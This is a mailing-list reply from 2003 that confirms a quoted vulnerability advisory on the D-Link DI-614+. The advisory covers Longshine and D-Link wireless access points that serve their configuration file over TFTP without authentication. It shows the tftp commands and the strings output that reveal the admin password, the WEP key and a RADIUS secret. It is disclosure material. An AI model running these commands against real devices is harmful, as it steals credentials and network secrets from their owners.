This vulnerability is also an issue on the popular DLink DI-614+ (which I think is based upon the Longshine product). I was able to grab config.img and also extract the "admin" password from it. This was confirmed with firmware version 2.03 dated 9/10/2002. On the DLink product, you can only perform this from the "LAN-side" of the device in the default configuration. DLink has version 2.10 available, dated 11/25/2002, but I have not tried it yet. -Jeff On Mon, 6 Jan 2003, Lukas Grunwald wrote: > > > Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps > > Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc. > > Description: Get Superuser Privileges and view the devices password and password and other passwords > > Versions affected: tested with 03.01.0b and 03.01.0h > > Vendor contacted: e-mailed Longshine at Sun Dec 29 > > Details: You are able to connect via tftp to the access-point an you can get download the configuration > without authentication the WEP Secret for the encryption and the password from your radius server is also readable. > In this configuration in the Username of the Superuser and the corresponding password stored. > The WEP Secret for the encryption and the password from your radius server is also readable. > This "attack" works via WLAN (!!!) and Ethernet. > > tftp > tftp> connect 192.168.108.48 > tftp> get config.img > Received 780 bytes in 1.0 seconds > tftp> quit > > [~]/-\>strings config.img > DNXLABAP01 <- name of the AP > root <- name of the superuser > XXXXXX123 <- password from superuser > DNXLABLAN <- ssid > secu9 <- secret for WEP > 7890abcdef <- > > You are also able to get the following files: > > config.img > wbtune.dat > mac.dat > rom.img > normal.img > > > Solution: after contact with the vendor he claims that a new firmware-upgrade > fixes this problem, but the latest available firmware on his web-page > dosn't fix it anyway. > > Vendor-Contact: > > LONGSHINE Technologie (Europe) GmbH > > An der Strusbek 9 > D-22926 Ahrensburg > > Tel: ++ 49 ( 0 ) 4102 / 4922- 0 > Fax: ++ 49 ( 0 ) 4102 / 40109 > > support@longshine.de >
